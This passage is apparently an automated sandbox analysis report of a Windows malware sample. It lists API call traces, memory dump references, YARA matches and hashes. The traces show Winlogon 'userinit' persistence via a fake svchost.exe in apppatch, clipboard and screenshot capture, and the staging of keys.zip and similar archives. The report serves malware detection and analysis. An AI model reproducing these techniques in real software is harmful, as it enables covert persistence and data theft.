                                                                                                                                                                                                              • Part of subcall function 02BBDF80: WindowFromPoint.USER32(76F930D0,?,?,02BBE016,?,02BBA857,?,76F930D0,?), ref: 02BBDFE8
                                                                                                                                                                                                            • RealChildWindowFromPoint.USER32(00000000,?,02BBA857,?,02BBA857,?,76F930D0,?), ref: 02BBE037
                                                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02BBA857,00000002,00000064,?), ref: 02BBE05D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBE081
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE092
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBE09D
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE0BB
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBE0C6
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BBA857), ref: 02BBE0D2
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002), ref: 02BBE0E6
                                                                                                                                                                                                            • GetWindowInfo.USER32(?,?), ref: 02BBE129
                                                                                                                                                                                                            • PtInRect.USER32(?,?,02BBA857), ref: 02BBE154
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE174
                                                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02BBA857,00000002,00000064,000000FF), ref: 02BBE1A3
                                                                                                                                                                                                            • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 02BBE1D0
                                                                                                                                                                                                            • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 02BBE1DB
                                                                                                                                                                                                            • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 02BBE1F7
                                                                                                                                                                                                            • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 02BBE202
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 1846550538-4251816714
                                                                                                                                                                                                            • Opcode ID: f29a0fcb686f15f1f78a2644fc8910dde4f18d17753442432f82e1c17429a30a
                                                                                                                                                                                                            • Instruction ID: dd6f3879b824cae557e6583da18cae66bfe836aafebf5e7a629c8626d2205653
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29a0fcb686f15f1f78a2644fc8910dde4f18d17753442432f82e1c17429a30a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F61AE75A40209ABDB21CE58DC84EFE73A9EF84761F544659FE50A3294CBB0EC11CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CA80,?,753CBF00), ref: 02BD10F0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,753CBF00), ref: 02BD1131
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,753CBF00), ref: 02BD113B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD1143
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD1154
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,753CBF00), ref: 02BD115B
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,753CBF00), ref: 02BD119A
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,753CBF00), ref: 02BD11A7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,753CBF00), ref: 02BD11F0
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,753CBF00), ref: 02BD120C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,753CBF00), ref: 02BD1229
                                                                                                                                                                                                              • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000008,00004070,76F90F00,00000000,76F92F00,?,02BC3CE8,?), ref: 02BD9793
                                                                                                                                                                                                              • Part of subcall function 02BD9780: HeapAlloc.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9796
                                                                                                                                                                                                              • Part of subcall function 02BD9780: memset.MSVCRT ref: 02BD97AB
                                                                                                                                                                                                              • Part of subcall function 02BD9780: CreateFileA.KERNEL32(02BC3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02BC3CE8,?), ref: 02BD9802
                                                                                                                                                                                                              • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9825
                                                                                                                                                                                                              • Part of subcall function 02BD9780: HeapValidate.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9828
                                                                                                                                                                                                              • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9834
                                                                                                                                                                                                              • Part of subcall function 02BD9780: HeapFree.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9837
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,753CBF00), ref: 02BD1258
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CA80,?,753CBF00), ref: 02BD1277
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,?,753CBF00), ref: 02BD12DB
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,753CBF00), ref: 02BD12E8
                                                                                                                                                                                                              • Part of subcall function 02BD9910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,76F92F00), ref: 02BD9991
                                                                                                                                                                                                              • Part of subcall function 02BD9910: _snprintf.MSVCRT ref: 02BD99AD
                                                                                                                                                                                                              • Part of subcall function 02BD9910: FindFirstFileA.KERNEL32(00000000,?), ref: 02BD99BC
                                                                                                                                                                                                              • Part of subcall function 02BD9910: LocalFree.KERNEL32(00000000), ref: 02BD99C9
                                                                                                                                                                                                              • Part of subcall function 02BD9910: wsprintfA.USER32 ref: 02BD9A08
                                                                                                                                                                                                              • Part of subcall function 02BD9910: wsprintfA.USER32 ref: 02BD9A16
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                            • String ID: \$inter.zip$path.txt
                                                                                                                                                                                                            • API String ID: 3082343898-67432706
                                                                                                                                                                                                            • Opcode ID: 1f228519e9ce739a249fb4622c1f1dc0bd30849bf9f2ed11b10f959ffc6bbd4f
                                                                                                                                                                                                            • Instruction ID: 23af6302e15f28dbf6c2c5b1f70058be5e5aadc89648a2471b07cf1a8891578c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f228519e9ce739a249fb4622c1f1dc0bd30849bf9f2ed11b10f959ffc6bbd4f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E61477094070A5FDB25CB789898BEB7BE8EF45340F4445D4EACDD7241EB71AA88CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D098), ref: 02BD3920
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3961
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD396B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD3973
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD3984
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD398B
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BD39BF
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BD39CC
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD3A10
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BD3A2C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BD3A49
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                             • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                             • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                            • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                            • API String ID: 3351314726-487659054
                                                                                                                                                                                                            • Opcode ID: 50d78aee7ed85f65595c3bef02fc9011bac002a1835ea2f3ab3dde42b6dad8fc
                                                                                                                                                                                                            • Instruction ID: bacdf51a1bca5e723375b89948e123e0ca4badadaf01c31f2442603daf70966f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50d78aee7ed85f65595c3bef02fc9011bac002a1835ea2f3ab3dde42b6dad8fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63612570A006595FDB25CB349898BEB7BE4EF45340F5445D4EACAD7242EB70A988CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90,?,?,00000000), ref: 02BD2920
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 02BD2961
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 02BD296B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2973
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD2984
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 02BD298B
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02BD29BF
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 02BD29CC
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 02BD2A10
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 02BD2A2C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02BD2A49
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                             • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                             • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                            • String ID: \$path.txt$rfk.zip
                                                                                                                                                                                                            • API String ID: 3351314726-233339579
                                                                                                                                                                                                            • Opcode ID: 778e3f09270b10924505d1e57674a1718a89fee11edf5736d3a37cdb7b4da3af
                                                                                                                                                                                                            • Instruction ID: 47628c43ae8e57af4e52fb445ac3493624071d6c6f7fd10827fe8323f503aee1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 778e3f09270b10924505d1e57674a1718a89fee11edf5736d3a37cdb7b4da3af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 656148309006995FDB358B349C98BFB7BE4EF45340F4445E4EAC9D7242EB70AA88CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileType.KERNEL32(?,00000000,00000000), ref: 02BD8899
                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 02BD88B6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                             • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                             • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleInformationType
                                                                                                                                                                                                            • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                            • API String ID: 4064226416-1748840775
                                                                                                                                                                                                            • Opcode ID: 95a4200ef0cefc3e09faf2d22ff674bbb6a7309c0a3c363113b800d53ae3f09e
                                                                                                                                                                                                            • Instruction ID: ca15629dbedd83c84a11be676ac98152bde204400b5730f0db2fd86f0de96b0e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95a4200ef0cefc3e09faf2d22ff674bbb6a7309c0a3c363113b800d53ae3f09e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D518F71D40219ABEB24CFA4DC89BFEBB78FB44701F504569FA14EB180E774A941CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC323D
                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 02BC325E
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC327F
                                                                                                                                                                                                            • GetGUIThreadInfo.USER32(00000000), ref: 02BC3286
                                                                                                                                                                                                            • GetOpenClipboardWindow.USER32 ref: 02BC329C
                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 02BC32AA
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02BC32D8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02BC32FA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC3301
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC3311
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02BC332E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC337B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC337E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC338B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC338E
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 02BC3399
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02BC33DF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                             • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                             • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                            • API String ID: 3472172748-4108050209
                                                                                                                                                                                                            • Opcode ID: 788504112fa3810a1e32d4a3e4edcd895b18b2a640364ca1f7faa2a921ade0b5
                                                                                                                                                                                                            • Instruction ID: 52f928dc8a451687a77e9397b1f0feac77296185b5650d944c9a35602381331c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 788504112fa3810a1e32d4a3e4edcd895b18b2a640364ca1f7faa2a921ade0b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC41F231604312ABD7209F649C4CF6B7BE8EFC5754F648B9CFA94D7280DB20DA148BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCB1F0
                                                                                                                                                                                                              • Part of subcall function 02BCB110: PathAddBackslashA.SHLWAPI(02C0C058), ref: 02BCB137
                                                                                                                                                                                                              • Part of subcall function 02BCB110: GetFileAttributesA.KERNEL32(?), ref: 02BCB175
                                                                                                                                                                                                              • Part of subcall function 02BCB110: PathFileExistsA.SHLWAPI(?), ref: 02BCB1B9
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058), ref: 02BCB238
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCB2A0
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCB2AD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058,?,?), ref: 02BCB2E7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCB36A
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BCB37E
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BCB391
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02BCB3C0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058), ref: 02BCB3CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCB3EE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BCB3F1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCB3FE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BCB401
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID: 5NT$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 2685098104-541280351
                                                                                                                                                                                                            • Opcode ID: fe349899d7ac646c63f3a48a52f2b0f123f44e7277c9b46d8c9c054436f23160
                                                                                                                                                                                                            • Instruction ID: 900c11c1b4498eb715a66454ce6496371e5f9c365f5fa493206f73847911ce43
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe349899d7ac646c63f3a48a52f2b0f123f44e7277c9b46d8c9c054436f23160
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 465138709407495FDB218B389899FEF7FE8EF45348F2486D8EA85DB241DB719848CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                            • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,00000000,?,00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401285
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                            • String ID: G,@
                                                                                                                                                                                                            • API String ID: 132362422-3313068137
                                                                                                                                                                                                            • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                            • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,76F930D0,00000000), ref: 02BD4A43
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,76DC0180), ref: 02BD4A6D
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BD4A8D
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BD4ABA
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02BD4ABE
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02BD4B60
                                                                                                                                                                                                              • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000,6F9890B0,02BC0C69), ref: 02BC41BE
                                                                                                                                                                                                              • Part of subcall function 02BC41B0: HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                              • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                              • Part of subcall function 02BC41B0: HeapFree.KERNEL32(00000000), ref: 02BC41D1
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02BD4B71
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BD4B7B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                            • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 579956326-2103896814
                                                                                                                                                                                                            • Opcode ID: 3651270a5cdb388e740aaadcc920aa9d146eab14830f736625838180e8695a9b
                                                                                                                                                                                                            • Instruction ID: fe181f4181763507234f3d90ad90dc1570fb569b6feec572c21d97e65abb377d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3651270a5cdb388e740aaadcc920aa9d146eab14830f736625838180e8695a9b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D512935600306FFEB208B649C98FFABBB9EF84744F1045C4FA46AB204E7719A19C790
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670), ref: 02BCF2F7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF33B
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCF347
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCF34B
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF35C
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCF363
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BCF390
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF39F
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCF3A5
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCF3A9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF3BA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCF3C1
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BCF3EF
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BCF405
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 1455050916-1670482240
                                                                                                                                                                                                            • Opcode ID: afc4346d664de6e07168b8e66440c3dd2b925e1932cc9160a97851c67049ffdd
                                                                                                                                                                                                            • Instruction ID: cdfff29c576b3314fc9af61887cf14929964b5a0856a5c98428e9c4dd98ea997
                                                                                                                                                                                                            • Opcode Fuzzy Hash: afc4346d664de6e07168b8e66440c3dd2b925e1932cc9160a97851c67049ffdd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E313B319442185BCB60DB789C48BEABBE9FF55740F5489D9E6C6D3100DFB0D984CBA0
                                                                                                                                                                                                            APIs
